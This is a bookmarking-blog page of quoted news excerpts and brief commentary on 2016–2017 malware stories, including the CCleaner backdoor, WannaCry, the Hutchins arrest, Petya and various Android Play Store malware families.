<p>Because the CCleaner backdoor was active for 31 days, the total number of infected computers is "likely at least in the order of hundreds," researchers from Avast, the antivirus company that acquired CCleaner in July, said in their own analysis published Thursday.

From September 12 to September 16, the highly advanced second stage was reserved for computers inside 20 companies or Web properties, including Cisco, Microsoft, Gmail, VMware, Akamai, Sony, and Samsung. The 20 computers that installed the payload were from eight of those targeted organizations, Avast said, without identifying which ones. Again, because the data covers only a small fraction of the time the backdoor was active, both Avast and Talos believe the true number of targets and victims was much bigger.

The second stage appears to use a completely different control network. The complex code is heavily obfuscated and uses anti-debugging and anti-emulation tricks to conceal its inner workings. Craig Williams, a senior technology leader and global outreach manager at Talos, said the code contains a "fileless" third stage that's injected into computer memory without ever being written to disk, a feature that further makes analysis difficult. Researchers are in the process of reverse engineering the payload to understand precisely what it does on infected networks…

…The group behind the attack remains unknown. Talos was able to confirm an observation, first made by AV provider Kaspersky Lab, that some of the code in the CCleaner backdoor overlaps with a backdoor used by a hacking group known both as APT 17 and Group 72. Researchers have tied this group to people in China.</p>


This is a hell of a thing.
malware  ccleaner 
september 2017 by charlesarthur
The Kronos needle in the AlphaBay haystack • emptywheel
"emptywheel" (the site has multiple authors) points out that it's odd how quickly the FBI alighted on the Kronos malware sale on AlphaBay, given how much else there was to look at:
<p>look at the overall numbers FBI boasted for AlphaBay when it announced its takedown on July 20, nine days after the indictment targeting Hutchins.
<p>AlphaBay reported that it serviced more than 200,000 users and 40,000 vendors. Around the time of takedown, the site had more than 250,000 listings for illegal drugs and toxic chemicals, and more than 100,000 listings for stolen and fraudulent identification documents, counterfeit goods, malware and other computer hacking tools, firearms, and fraudulent services. By comparison, the Silk Road dark market—the largest such enterprise of its kind before it was shut down in 2013—had approximately 14,000 listings.

The operation to seize AlphaBay’s servers was led by the FBI and involved the cooperative efforts of law enforcement agencies in Thailand, the Netherlands, Lithuania, Canada, the United Kingdom, and France, along with the European law enforcement agency Europol.

“Conservatively, several hundred investigations across the globe were being conducted at the same time as a result of AlphaBay’s illegal activities,” Phirippidis said. “It really took an all-hands effort among law enforcement worldwide to deconflict and protect those ongoing investigations.”</p>


Of the 40,000 vendors charged within a month of takedown, of the 250K drug listings and the 100K fraudulent services listings, the guy who sold Kronos once for $2,000 (whom <a href="https://www.forbes.com/sites/thomasbrewster/2017/08/04/marcus-hutchins-case-kronos-malware-not-hot-in-cybercrime/#7bfd9a9a345c">Tom Fox-Brewster thinks might be a guy named VinnyK</a>) — and by virtue of American conspiracy laws, Hutchins — were among the first 20 or so known to be charged for using AlphaBay.</p>


All the indicators are that someone who was nabbed in the AlphaBay sting was somehow implicated in Kronos, and put Hutchins's name forward as a co-conspirator. It's a way to get the feds off your back.
malware  kronos  alphabay 
august 2017 by charlesarthur
Briton who stopped WannaCry attack arrested over separate malware claims • The Guardian
Alex Hern and Sam Levin:
<p>Marcus Hutchins, the 23-year-old British security researcher who was credited with stopping the WannaCry outbreak in its tracks by discovering a hidden “kill switch” for the malware, has been arrested by the FBI over his alleged involvement in another malicious software targeting bank accounts.

According to an indictment released by the US Department of Justice on Thursday, Hutchins is accused of having helped to create, spread and maintain the banking trojan Kronos between 2014 and 2015.

The Kronos malware was spread through emails with malicious attachments such as compromised Microsoft word documents, and hijacks credentials like internet banking passwords to let its user steal money with ease.

Hutchins, who is indicted with another unnamed co-defendant, stands accused of six counts of hacking-related crimes as a result of his alleged involvement with Kronos. “Defendant Marcus Hutchins created the Kronos malware,” the indictment, filed on behalf of the eastern district court of Wisconsin, alleges.

Hutchins, better known online by his handle MalwareTech, had been in Las Vegas for the annual Def Con hacking conference, the largest of its kind in the world. He was at the airport preparing to leave the country when he was arrested, after more than a week in the the city without incident.</p>


This is utterly weird. <a href="https://www.documentcloud.org/documents/3912524-Kronos-Indictment-R.html">Here's the indictment</a>, via <a href="https://motherboard.vice.com/en_us/article/pagn7v/malwaretech-wannacry-indictment-kronos-malware">Motherboard</a>. It names (but obscures) the name of someone else who was apparently in Wisconsin. It sounds like the other person has fingered Hutchins. Whether that's true is a different matter.
malwaretech  malware  kronos  hacking 
august 2017 by charlesarthur
Misconceptions about Android — Tech Specs
Daniel Matte has a few points to make, of which this is probably the key one:
<p>Malware on Android is often portrayed as an ever-growing, constant crisis. While Android does have tons of major security concerns, the overall issue is still hugely overstated.

Firstly, the term malware can mean absolutely anything. The vast majority of stories about mobile security spread FUD and sensationalism, to the detriment of readers. I won’t pretend to be a security expert, but even imperfect sandboxing probably goes a long way compared to the completely unsandboxed traditional PC application environments. It doesn’t seem clear to me whether Android or macOS is more secure overall, for example. As with many things, it probably depends.

There is however an extreme case: the Chinese market. Because Android is out of Google’s control in China, the OS genuinely is a security nightmare in the country. I remember waiting for a flight at the airport in Beijing and watching with amusement as some seemingly low-threat app started downloading itself onto my phone over the air. All I did was merely have Wi-Fi on; I hadn’t attempted to connect to any access points.</p>


You should also note his points about force-quitting Android apps, touch latency, and why people perceive its scrolling and similar as "janky".
android  malware 
july 2017 by charlesarthur
Petya.2017 is a wiper, not a ransomware • Comae Technologies
Matt Suiche:
<p>We believe the ransomware was in fact a lure to control the media narrative, especially after the WannaCry incidents to attract the attention on some mysterious hacker group rather than a national state attacker like we have seen in the past in cases that involved wipers such as Shamoon.

Lately, the number of attacks against Ukraine increased from Power Grids being shut down to the car a top military intelligence officer exploding yesterday — the day Petya.2017 infected Ukraine.

The fact of pretending to be a ransomware while being in fact a nation state attack — especially since WannaCry proved that widely spread ransomware aren’t financially profitable — is in our opinion a very subtle way from the attacker to control the narrative of the attack.</p>


A "wiper" simply ruins the first or more sectors of the boot disc, meaning that you can't recover your files. Petya's email address has been shut down too. The emerging narrative is that this is North Korea or Russia: the latter would be aiming at zapping systems in Ukraine, where the first infections were spotted.
petya  malware  ransomware 
june 2017 by charlesarthur
Android malware hid in Google Play apps to inject code into system runtime libraries • Graham Cluley
<p>A type of Android malware known as Dvmap hid in apps available on the Google Play Store in order to inject malicious code into system runtime libraries.

So far, Kaspersky has detected at least 50,000 downloads of the malware, which hid in apps like the puzzle game "colourblock" on Google's Play Store…

Upon initial installation, the malware attempts to gain root privileges and to install some modules, including a malicious app called com.qualcmm.timeservices. It then launches a start file to check the Android system version and determine which runtime system library to patch…

…The malicious ip file is capable of disabling "VerifyApps," [Google's app verification daemon] changing system settings to allow the installation of apps from third-party marketplaces, and grant com.qualcmm.timeservices Device Administrator rights. This app can then use those rights to download archives and connect to its C&C.

To protect themselves against Dvmap, users should install an anti-virus solution onto their devices. They should also be careful about what apps they install onto their phones. As Dvmap and other threats prove, malware can hide in apps available on Google's Play Store.</p>


Downloading modules seen as hazardous.
android  malware 
june 2017 by charlesarthur
Russian malware communicates by leaving comments in Britney Spears's Instagram account • Boing Boing
Cory Doctorow:
<p>A key weakness in malicious software is the "Command and Control" (C&C) system: a central server that the malware-infected systems contact to receive updates and instructions, and to send stolen data. Anti-malware researchers like to reverse engineer malicious code, discover the C&C server's address, and then shut it down or blacklist it from corporate routers.

Turla is an "advanced persistent threat" hacking group based in Russia with a long history of attacking states in ways that advance Russian state interests -- suggesting that they are either a part of the Russian espionage system, or contracting to it.

A new analysis by Eset shows that Turla is solving its C&C problems by using Britney Spears' Instagram account as a cut-out for its C&C servers. Turla moves the C&C server around, then hides the current address of the server in encrypted comments left on Britney Spears's image posts. The compromised systems check in with Spears's Instagram whenever they need to know where the C&C server is currently residing.</p>


This is like the <a href="https://en.wikipedia.org/wiki/Three_Days_of_the_Condor">subplot of Three Days of the Condor</a>, but for the computer world.
security  britneyspears  bot  malware 
june 2017 by charlesarthur
Fireball malware infects 20% of corporate networks worldwide • Infosecurity Magazine
Tara Seals:
<p>A browser-hijacker called Fireball has ignited concern, having already infected more than 250 million computers worldwide, and 20% of corporate networks globally. 

According to Check Point, it takes over target web browsers, turning them into zombies. However, Fireball also can be turned into a fully functioning malware downloader, and is capable of executing any code on the victim machines. That means it can carry out a wide range of actions, including stealing credentials and loading ransomware.

For now, it seems focused on adware. Fireball manipulates victims’ browsers and turns their default search engines and home pages into fake search engines, which simply redirect the queries to either yahoo.com or Google.com to generate ad revenue. According to Alexa’s web traffic data, 14 of these fake search engines are among the top 10,000 websites, with some of them occasionally reaching the top 1,000.

Fireball also installs plug-ins and additional configurations to boost its advertisement activity.

“It’s run by a Chinese digital marketing agency, called Rafotech,” Check Point noted in an analysis. “Rafotech carefully walks along the edge of legitimacy, knowing that adware distribution is not considered a crime like malware distribution is. Many companies provide software or services for free, and make their profits by harvesting data or presenting advertisements. Once a client agrees to the install of extra features or software to his/her computer, it is hard to claim malicious intent on behalf of the provider.”</p>
malware  browser 
june 2017 by charlesarthur
Android malware Judy' hits as many as 36.5 million phones • Fortune.com
David Morris:
<p>While the actual extent of the malicious code’s spread is unknown, Checkpoint says it may have reached as many as 36.5 million users, making it potentially the most widely-spread malware yet found on Google Play. Google removed the apps after being notified by Checkpoint.

The malicious apps primarily included a series of casual cooking and fashion games under the “Judy” brand, a name borrowed for the malware itself. The nefarious nature of the programs went unnoticed in large part, according to Checkpoint, because its malware payload was downloaded from a non-Google server after the programs were installed. The code would then use the infected phone to click on Google ads, generating fraudulent revenue for the attacker.

The infection may have spread even more widely than Checkpoint’s estimates, since not all of the extensive line of “Judy” apps are included on Checkpoint’s tally – it’s missing Fashion Judy: Magic Girl Style and Fashion Judy: Masquerade Style, among others. All installments of the series do appear to have been pulled from Google Play.

The “Judy” apps were published by an apparently Korean entity known as ENISTUDIO. However, iterations of the same attack were found on a handful of apps from other publishers.</p>
android  malware 
may 2017 by charlesarthur
Hacked in Translation: from subtitles to complete takeover • Check Point Blog
<p>Our research reveals a new possible attack vector, using a completely overlooked technique in which the cyberattack is delivered when movie subtitles are loaded by the user’s media player. These subtitles repositories are, in practice, treated as a trusted source by the user or media player; our research also reveals that those repositories can be manipulated and be made to award the attacker’s malicious subtitles a high score, which results in those specific subtitles being served to the user. This method requires little or no deliberate action on the part of the user, making it all the more dangerous.

Unlike traditional attack vectors, which security firms and users are widely aware of, movie subtitles are perceived as nothing more than benign text files. This means users, Anti-Virus software, and other security solutions vet them without trying to assess their real nature, leaving millions of users exposed to this risk.

The attack vector relies heavily on the poor state of security in the way various media players process subtitle files and the large number of subtitle formats. To begin with, there are over 25 subtitle formats in use, each with unique features and capabilities. Media players often need to parse together multiple subtitle formats to ensure coverage and provide a better user experience, with each media player using a different method. Like other, similar situations which involve fragmented software, this results in numerous distinct vulnerabilities… To date, we tested and found vulnerabilities in four of the most prominent media players: VLC, Kodi, Popcorn Time and Stremio</p>


Check Point puts the number potentially at risk in the "hundreds of millions". There's a video too:

<iframe width="560" height="315" src="https://www.youtube.com/embed/vYT_EGty_6A" frameborder="0" allowfullscreen></iframe>

A long time ago, the then video producer for Nine Inch Nails showed me how he had written a firmware hack so that playing a DVD video single (that's how long ago it was) would load a program that would take over your DVD. But he never distributed it, because the record company pointed out they could all be done for hacking. Nowadays, of course, you download your own destruction.
security  malware  subtitle 
may 2017 by charlesarthur
Exclusive: Hackers hit Russian bank customers, planned international cyber raids • Reuters
Jack Stubbs:
<p>Russian cyber criminals used malware planted on Android mobile devices to steal from domestic bank customers and were planning to target European lenders before their arrest, investigators and sources with knowledge of the case told Reuters.

Their campaign raised a relatively small sum by cyber-crime standards - more than 50 million roubles ($892,000) - but they had also obtained more sophisticated malicious software for a modest monthly fee to go after the clients of banks in France and possibly a range of other western nations.

Russia's relationship to cyber crime is under intense scrutiny after U.S. intelligence officials alleged that Russian hackers had tried to help Republican Donald Trump win the U.S. presidency by hacking Democratic Party servers.

The Kremlin has repeatedly denied the allegation.

The gang members tricked the Russian banks' customers into downloading malware via fake mobile banking applications, as well as via pornography and e-commerce programs, according to a report compiled by cyber security firm Group-IB which investigated the attack with the Russian Interior Ministry.

The criminals - 16 suspects were arrested by Russian law enforcement authorities in November last year - infected more than a million smartphones in Russia, on average compromising 3,500 devices a day, Group-IB said.</p>


This seems to have been taking advantage of flaws in Android OS, but without more detail it's hard to be sure. Killer quote from a Sherbank spokeswoman:
<p>"It isn't clear which specific group is being referred to here because the fraudulent scheme involving Android OS (operating system) viruses is widespread in Russia and Sberbank has effectively combated it for an extensive period of time."</p>
russia  malware  virus  banking 
may 2017 by charlesarthur
Another large-scale cyberattack underway, experts say • The Japan Times
<p>Instead of completely disabling an infected computer by encrypting data and seeking a ransom payment, Adylkuzz uses the machines it infects to “mine” in a background task a virtual currency, Monero, and transfer the money created to the authors of the virus.

Virtual currencies such as Monero and Bitcoin use the computers of volunteers to record transactions. They are said to “mine” for the currency and are occasionally rewarded with a piece of it.

<a href="https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar">Proofpoint said in a blog post</a> that symptoms of the attack include loss of access to shared Windows resources and degradation of PC and server performance, effects that some users may not notice immediately.

“As it is silent and doesn’t trouble the user, the Adylkuzz attack is much more profitable for the cyber criminals. It transforms the infected users into unwitting financial supporters of their attackers,” said Godier.

Proofpoint said it has detected infected machines that have transferred several thousand dollars worth of Monero to the creators of the virus.

The firm believes Adylkuzz has been on the loose since at least May 2, and perhaps even since April 24, but due to its stealthy nature was not immediately detected.

“We don’t know how big it is” but “it’s much bigger than WannaCry,” said Robert Holmes, Proofpoint’s vice president for email products.

A U.S. official on Tuesday put the number of computers infected by WannaCry at over 300,000.</p>


This is from last week but points to something interesting. ProofPoint says that *this* one, which preceded Wannacry, shuts down SMB networking - and so could have limited the spread of Wannacry. Does that imply that they're separate groups behind the two? Or that Wannacry was an attempt to monetise the same attack more quickly?
wannacry  ransomware  bitcoin  malware 
may 2017 by charlesarthur
How to accidentally stop a global cyber attack • MalwareTech
The anonymous @malwaretech, who registered the domain that was hard-coded into the Wannacry ransomware:
<p>one thing that’s important to note is the actual registration of the domain was not on a whim. My job is to look for ways we can track and potentially stop botnets (and other kinds of malware), so I’m always on the lookout to pick up unregistered malware control server (C2) domains. In fact I registered several thousand of such domains in the past year.

Our standard model goes something like this.

1) Look for unregistered or expired C2 domains belonging to active botnets and point it to our sinkhole (a sinkhole is a server designed to capture malicious traffic and prevent control of infected computers by the criminals who infected them).

2) Gather data on the geographical distribution and scale of the infections, including IP addresses, which can be used to notify victims that they’re infected and assist law enforcement.

3) Reverse engineer the malware and see if there are any vulnerabilities in the code which would allow us to take-over the malware/botnet and prevent the spread or malicious use, via the domain we registered.
In the case of WannaCrypt, step 1, 2 and 3 were all one and the same, I just didn’t know it yet.

A few seconds after the domain had gone live I received a DM from a Talos analyst asking for the sample I had which was scanning SMB host, which i provided. Humorously at this point we had unknowingly killed the malware so there was much confusion as to why he could not run the exact same sample I just ran and get any results at all. As curious as this was, I was pressed for time and wasn’t able to investigate, because now the sinkhole servers were coming dangerously close to their maximum load.</p>


His full post includes his concern that by registering the domain, he'd actually <em>activated</em> the malware. It's quite a tale. Plus he has praise for the UK's National Cyber Security Centre and the FBI, among others.
security  malware  ransomware 
may 2017 by charlesarthur
8,400 new Android malware samples every day • G DATA
<p> G DATA security experts discovered over 750,000 new Android malware apps in the first quarter of 2017. That represents almost 8,400 new malware instances every day.

Following a new negative overall record of over 3.2 million new Android malware files in 2016, the year 2017 was off to a slower start in comparison with same quarter of the previous year. G DATA security experts counted 750,000 new malware files in the first quarter of 2017. The malware figures remained the same in the fourth quarter of 2016. The threat level for users with smartphones and tablets with an Android operating system remains high. In all, the G DATA security experts expect around 3.5 million new Android malware apps for 2017…

…A comprehensive security solution is becoming more and more important for smartphones and tablets. The security app should include a virus scanner that checks the mobile device for Trojans, viruses and other malware. Furthermore it should include surfing and phishing protection to secure users against dangerous emails and websites.</p>


Hmm. A huge flow of Android malware, but very little evidence of infections. How many people run antivirus on their Android phone? (I'm guessing close to zero.) How many get infected? I'm guessing ditto on that. The risks are real, but tiny.
android  malware 
may 2017 by charlesarthur
Super Free Music Player in Google Play is malware: a technical analysis • Naked Security
<p>SophosLabs has identified the following characteristics of Super Free Music Player:

• The dropper downloaded from Google Play is named com.superfreemusic.songapp. 
• The payload is decrypted and planted on Android devices by the dropper.

First, the dropper starts a service called com.hole.content.Erpbiobuft to decrypt and drop the payload. It will continues running this service every hour.

It decrypts and drops the payload. It then continues running this service every hour. The dropper then uses dynamic code and reflection to load the payload method (com.fb.content.core.enter).

To avoid detection from Google Play, the payload will verify if a device is an emulator by checking several properties such as the emulator phone number (15555215554, 15555215556…) and specific strings such as (/system/lib/libc_malloc_debug_qemu.so, /sys/qemu_trace …). Moreover, it is able to check if a popular Android research sandbox, TaintDroid, is used. Also, another time bomb is used to avoid detection.</p>


It's that last point which is the eye-opener: if Google Play's detection systems all work on emulation, then this is a problem.
malware  android  emulation 
may 2017 by charlesarthur
Fixing your oven can cook your computer • The Register
Simon Sharwood:
If your Hotpoint cooker or washer's on the blink, don't arrange a repair by visiting the manufacturer's website: the appliance vendor has been inadvertently foisting nastyware onto visitors.

As <a href="https://news.netcraft.com/archives/2017/04/17/hotpoint-service-sites-hacked.html">spotted by Netcraft</a>, fake Java update dialogs started appearing on Hotpoint's UK and Republic of Ireland sites this week. If you click “Install” you won't be updating Java, you'll be firing up obfuscated JavaScript that Hotpoint did not place on its site. That script tries to hide the fact it refers to a third-party site that can send a custom payload of malware your way.

That payload won't do nice things to your endpoint and may expose you to attacks like drive-by malware or phishing.

Netcraft says the source of the problem is almost certainly Hotpoint's WordPress installation, and notes that the content management system “is notorious for being compromised if both it and its plugins are not kept up to date.”


Things you didn't have to worry about ten years ago.
hotpoint  wordpress  malware 
april 2017 by charlesarthur
Forget Mirai – Brickerbot malware will kill your crap IoT devices • The Register
Iain Thomson:
<p>A new form of attack code has come to town and it uses techniques similar to Mirai to permanently scramble Internet of Things devices.

On March 20 researchers at security shop Radware spotted the malware, dubbed Brickerbot, cropping up in honeypots it sets up across the web to lure interesting samples. In the space of four days, one honeypot logged 1,895 infection attempts by Brickbot, with the majority of attacks coming from Argentina, and a second logged 333 attempts – untraceable as they came from a Tor node.

"The Bricker Bot attack used Telnet brute force – the same exploit vector used by Mirai – to breach a victim's devices," <a href="https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/">Radware's advisory</a> states.

"Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but were able to record that the first attempted username/password pair was consistently 'root'/'vizxv.'"</p>


There's a suggestion that it's trying to brick devices before they can become part of a botnet. Seems like burning the village to save it if so.
malware  iot  security 
april 2017 by charlesarthur
If you download Minecraft mods from Google Play, read on … • We Live Security
Lukas Stefanko:
<p>When launched, the apps immediately request device administrator rights. Once device administrator is activated, a screen with an “INSTALL MOD” button is displayed. Simultaneously, a push notification informs the user that a “special Block Launcher” is needed in order to proceed with the installation.

After clicking the “INSTALL MOD” button, the user is prompted to install the additional module “Block Launcher Pro”, granting it several intrusive permissions (including device administrator rights) in the process. The payload downloaded during the installation is detected by ESET as Android/Hiddad.DA.

Installing the module brings the user to a dead end – a static Minecraft-themed screen with no clickable elements. The only actual function of the app and its module is to display ads – which now show up on the user’s device, interrupting their activity.

Interestingly, this ad-displaying downloader is an evolved version of an app that was originally uploaded to Google Play in February. The original version used a similar interface and also demanded device administrator rights. However, it didn’t have any downloading functionality and, unlike the downloader analyzed in this article, the first version actually provided the user with real Minecraft mods.

Since the result of this evolution – a downloader – is able to download any sort of additional malware to the victim’s device, there is no reason to believe malware authors would stop at only displaying unwanted ads.</p>


Got to nearly a million installs before they spotted it and reported it. Clearly, Google's proactive PHA (potentially harmful apps) program isn't quite perfect when it comes to this stuff.
minecraft  android  malware 
march 2017 by charlesarthur
Diverse protections for a diverse ecosystem: Android Security 2016 Year in Review • Official Google blog
Mel Miller, Android security program manager, introducing the overview:
<p>Security updates are regularly highlighted as a pillar of mobile security—and rightly so. We launched our monthly security updates program in 2015, following the public disclosure of a bug in Stagefright, to help accelerate patching security vulnerabilities across devices from many different device makers. This program expanded significantly in 2016:

• More than 735m devices from 200+ manufacturers received a platform security update in 2016.
• We released monthly Android security updates throughout the year for devices running Android 4.4.4 and up—that accounts for 86.3% of all active Android devices worldwide.
• Our carrier and hardware partners helped expand deployment of these updates, releasing updates for over half of the top 50 devices worldwide in the last quarter of 2016.

We provided monthly security updates for all supported Pixel and Nexus devices throughout 2016, and we’re thrilled to see our partners invest significantly in regular updates as well. There’s still a lot of room for improvement however. About half of devices in use at the end of 2016 had not received a platform security update in the previous year.</p>


Take the first bullet point together with the final sentence, and you get a figure of about 1.4bn-1.5bn Google Android devices in use at the end of 2016. (That doesn't include China, of course, where it's AOSP Android without Google services.)

Sideloading meanwhile remains the risk for malware:
<p>there’s more work to do for devices overall, especially those that install apps from multiple sources. While only 0.71% of all Android devices had PHAs installed at the end of 2016, that was a slight increase from about 0.5% in the beginning of 2015. Using improved tools and the knowledge we gained in 2016, we think we can reduce the number of devices affected by PHAs in 2017, no matter where people get their apps.</p>


I'd love to know the reason behind that increase. It suggests about 10m infected devices outside China.
android  security  malware 
march 2017 by charlesarthur
Detecting and eliminating Chamois, a fraud botnet on Android • Android Developers Blog
Bernhard Grill, Megan Ruthven, and Xin Zhao (security software engineers):
<p>Chamois is an Android PHA [malware - "potentially harmful application"] family capable of:

• Generating invalid traffic through ad pop ups having deceptive graphics inside the ad
• Performing artificial app promotion by automatically installing apps in the background
• Performing telephony fraud by sending premium text messages
• Downloading and executing additional plugins
• Interference with the ads ecosystem

We detected Chamois during a routine ad traffic quality evaluation. We analyzed malicious apps based on Chamois, and found that they employed several methods to avoid detection and tried to trick users into clicking ads by displaying deceptive graphics. This sometimes resulted in downloading of other apps that commit SMS fraud. So we blocked the Chamois app family using Verify Apps and also kicked out bad actors who were trying to game our ad systems.

Our previous experience with ad fraud apps like this one enabled our teams to swiftly take action to protect both our advertisers and Android users. Because the malicious app didn't appear in the device's app list, most users wouldn't have seen or known to uninstall the unwanted app. This is why Google's Verify Apps is so valuable, as it helps users discover PHAs and delete them.

Chamois was one of the largest PHA families seen on Android to date and distributed through multiple channels. To the best of our knowledge Google is the first to publicly identify and track Chamois.</p>


Notable what Google isn't saying: how many apps had this; how many developers were involved; how many downloads there had been (of apps which contained this malware); how long it had been going on; how many people have been affected.

One other note:
<p>"Our security teams sifted through more than 100K lines of sophisticated code written by seemingly professional developers. Due to the sheer size of the APK, it took some time to understand Chamois in detail."</p>


"Seemingly professional"? Anyone who writes that amount of code isn't doing it for laughs, and if they evaded Google for as long as they clearly did, they're at least "professional".
android  malware 
march 2017 by charlesarthur
Apple deleted server supplier after finding infected firmware in servers [Updated] • Ars Technica
Sean Gallagher, first repeating and then updating <a href="https://www.theinformation.com/apple-severed-ties-with-server-supplier-after-security-concern?shared=516084">a story from The Information</a> about Apple dumping SuperMicro Systems over dodgy firmware:
<p>Apple has used a variety of other companies' server hardware—since the company got out of the server business itself and never used its own in datacenters—including servers from HP and storage from NetApp. A few years ago, Apple added Supermicro as a supplier for some of its development and data center computing infrastructure.

But Apple has been squeezing the cost of its data center supply chain and moving toward more custom hardware much like the other cloud giants. In August of 2016, Digitimes reported Apple was increasing its orders for full-rack systems from the integrator ZT Systems and adding the China-based Inspur as a server supplier.

Leng told The Information that Apple was the only company to report the firmware issue, and he said the servers are used by thousands of customers. He asserted that when his company asked Apple's engineers to provide information about the firmware, they gave an incorrect version number—and then refused to give further information.

Update: A source familiar with the case at Apple told Ars that the compromised firmware affected servers in Apple's design lab, and not active Siri servers. The firmware, according to the source, was downloaded directly from Supermicro's support site—and that firmware is still hosted there.</p>


Wonder how the infection was spotted. Did it phone home?
apple  supermicro  firmware  malware 
march 2017 by charlesarthur
New Mac malware pinned on same Russian group blamed for election hacks • Ars Technica
Dan Goodin:
<p>APT28, the Russian hacking group tied to last year's interference in the 2016 presidential election, has long been known for its advanced arsenal of tools for penetrating Windows, iOS, Android, and Linux devices. Now, researchers have uncovered an equally sophisticated malware package the group used to compromise Macs.

Like its counterparts for other platforms, the Mac version of Xagent is a modular backdoor that can be customized to meet the objectives of a given intrusion, researchers from antivirus provider Bitdefender reported in a blog post published Tuesday. Capabilities include logging passwords, snapping pictures of screen displays, and stealing iOS backups stored on the compromised Mac.

The discovery builds on the already considerable number of tools attributed to APT28, which other researchers call Sofacy, Sednit, Fancy Bear, and Pawn Storm. According to researchers at CrowdStrike and other security firms, APT28 has been operating since at least 2007 and is closely tied to the Russian government. An analysis Bitdefender published last year determined APT28 members spoke Russian, worked mostly during Russian business hours, and pursued targets located in Ukraine, Spain, Russia, Romania, the US, and Canada.</p>
malware  macos 
february 2017 by charlesarthur
Google claims ‘massive’ Stagefright Android bug had 'sod all effect' • The Register
Iain Thomson:
<p>Despite shrill wailings by computer security experts over vulnerabilities in Android, Google claims very, very few of people have ever suffered at the hands of its bugs.

Speaking at the RSA security conference in San Francisco on Tuesday, Adrian Ludwig, director of Android security, said the Stagefright hole – which prompted the Chocolate Factory to start emitting low-level security patches on a monthly basis – did put 95% of Android devices at risk of attack. However, there have been no “confirmed” cases of infections via the bug, Ludwig claimed.

It was a similar story for the MasterKey vulnerability that was spotted in 2013, he said. In that case, 99% of Android devices were vulnerable, but exploits abusing the security blunder peaked at less than eight infections per million users, it was claimed. And there were no exploits for the hole before details of the flaw were made public.

He also cited the 2014 FakeID flaw, disclosed at Black Hat that year. This affected 82% of Android users but exploits peaked at one infection per million users after the details were released, and none before that, we're told.

Ludwig said he was sure of his figures, due to malware-detection routines, dubbed Verify Apps, in Google Play services, which is installed on more than 1.4 billion Android handhelds. Verify Apps reports back to Google when a software nasty is spotted on the device, allowing the web giant to tot up infection tallies.</p>


Well, OK, but Stagefright could be exploited by picture message, and then hacked the OS. Verify Apps wouldn't see it. And given the extraordinarily broad permissions that the average Android app demands, and is granted, why bother with malware?
android  malware 
february 2017 by charlesarthur
University attacked by its own vending machines, smart light bulbs & 5,000 IoT devices • Network World
"Ms Smith":
<p>Today’s cautionary tale comes from Verizon’s sneak peek (pdf) of the 2017 Data Breach Digest scenario. It involves an unnamed university, seafood searches, and an IoT botnet; hackers used the university’s own vending machines and other IoT devices to attack the university’s network.

Since the university’s help desk had previously blown off student complaints about slow or inaccessible network connectivity, it was a mess by the time a senior member of the IT security team was notified. The incident is given from that team member’s perspective; he or she suspected something fishy after detecting a sudden big interest in seafood-related domains.

The “incident commander” noticed “the name servers, responsible for Domain Name Service (DNS) lookups, were producing high-volume alerts and showed an abnormal number of sub-domains related to seafood. As the servers struggled to keep up, legitimate lookups were being dropped—preventing access to the majority of the internet.” That explained the “slow network” issues, but not much else.

The university then contacted the Verizon RISK (Research, Investigations, Solutions and Knowledge) Team and handed over DNS and firewall logs. The RISK team discovered the university’s hijacked vending machines and 5,000 other IoT devices were making seafood-related DNS requests every 15 minutes.</p>
iot  hacking  malware 
february 2017 by charlesarthur
Neuroscience explains why we get hacked so easily • MIT Technology Review
Tom Simonite:
<p>Multitasking is partly to blame. [Associate professor at Brigham Young University Anthony] Vance’s collaboration with Google grew out of experiments that showed when people reacted to security warnings while also performing another task, brain activity in areas associated with fully engaging with a warning was significantly reduced. People were three times less likely to correctly interpret a message when they reacted to security warnings while also performing another task.

Vance’s lab teamed up with Google to test a version of [its browser] Chrome modified to deliver warnings about a person’s computer possibly being infected by malware or adware only when they weren’t deeply engaged in something. For example, it would wait until someone finished watching a video, or was waiting for a file to download or upload, to pop up the message.

<a href="http://pubsonline.informs.org/doi/pdf/10.1287/isre.2016.0644">Testing showed</a> that people using the interruption-sensitive version of Chrome ignored the message only about a third of the time, compared to about 80 percent of the time without it.

Other studies in Vance’s lab have shown that people very rapidly become habituated to security warnings—he’s shown how the brain’s response to a message drops significantly even on just the second time someone sees it.

The researchers also did follow-up experiments in which people were asked to download mobile apps that asked for alarming permissions (for example, “Can delete your photos”). By breaking the usual rules of software design and having the security-related messages change in appearance slightly each time—for example, with different colors—it was possible to reduce the habituation effect.</p>
neuroscience  google  security  malware 
february 2017 by charlesarthur
VPN on Android means 'voyeuristic peeper network' in many cases • The Register
<p>A worrying number of VPN apps for Android mobile devices are rife with malware, spying, and code injection, say researchers.

A <a href="http://www.icir.org/vern/papers/vpn-apps-imc16.pdf">study</a> [PDF] from the University of New South Wales in Australia and the University of California at Berkeley found that Android apps advertising themselves as VPN clients often contain poor security protections, and in some cases engage in outright malicious activities.

"Many apps may legitimately use the VPN permission to offer (some form of) online anonymity or to enable access to censored content," the researchers write. "However, malicious app developers may abuse it to harvest users' personal information."

That sort of malicious activity is shockingly common, the researchers found. They studied the activity of 283 VPN apps on the Google Play store and catalogued the various risky and malicious activities they found:

82% of the VPN apps requested permission to access sensitive data on the device, such as SMS history<br />• 38% of the apps contained some form of malware<br />16% routed traffic through other devices, rather than a host server<br />16% use in-path proxies to modify HTML traffic in transit<br />Three of the 283 analysed apps specifically intercept bank, messaging, and social network traffic.</p>


That's not good. (It's because it can break app sandboxing on Android; not sure whether this applies to iOS.)
android  vpn  malware 
january 2017 by charlesarthur
Silence speaks louder than words when finding malware • Android Developers Blog
Megan Ruthven, software engineer:
<p>One security solution included on all devices with Google Play is <a href="https://support.google.com/accounts/answer/2812853?hl=en">Verify apps</a>. Verify apps checks if there are Potentially Harmful Apps (PHAs) on your device. If a PHA is found, Verify apps warns the user and enables them to uninstall the app.

But, sometimes devices stop checking up with Verify apps. This may happen for a non-security related reason, like buying a new phone, or, it could mean something more concerning is going on. When a device stops checking up with Verify apps, it is considered Dead or Insecure (DOI). An app with a high enough percentage of DOI devices downloading it is considered a DOI app. We use the DOI metric, along with the other security systems to help determine if an app is a PHA to protect Android users. Additionally, when we discover vulnerabilities, we patch Android devices with our <a href="https://source.android.com/security/bulletin/">security update system</a>…

